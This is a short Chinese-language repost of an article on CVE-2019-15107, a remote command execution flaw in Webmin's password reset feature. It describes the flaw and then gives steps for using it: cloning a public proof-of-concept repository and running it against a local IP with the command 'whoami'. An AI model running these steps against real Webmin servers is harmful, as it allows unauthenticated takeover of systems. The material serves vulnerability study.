CVE-2019-15107 简单利用
2019-10-10 11:18:43 Author: mp.weixin.qq.com(查看原文) 阅读量:54 收藏

漏洞描述


近日Webmin被发现存在一处远程命令执行漏洞,经过分析后,初步猜测其为一次后门植入事件。Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。据统计,互联网上大约有13w台机器使用Webmin。当用户开启Webmin密码重置功能后,攻击者可以通过发送POST请求在目标系统中执行任意命令,且无需身份验证。

漏洞利用
首先下载CVE-2019-15107
https://github.com/jas502n/CVE-2019-15107

CVE利用
git clone 

https://github.com/jas502n/CVE-2019-15107
cd CVE-2019-15107
python CVE_2019_15107.py https://192.168.123.23:10000 "whoami"

※ 此实验仅供大家学习参考,其他违法行为本人不负任何责任,在此申明!


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650457623&idx=3&sn=aea6fc2f2d04fa3eb1a534521dada7cc&chksm=83bba3f3b4cc2ae5ccdb719883fab53f35c6cec1bf36b994e5e0561166e404d97d06bb15a794#rd
如有侵权请联系:admin#unsafe.sh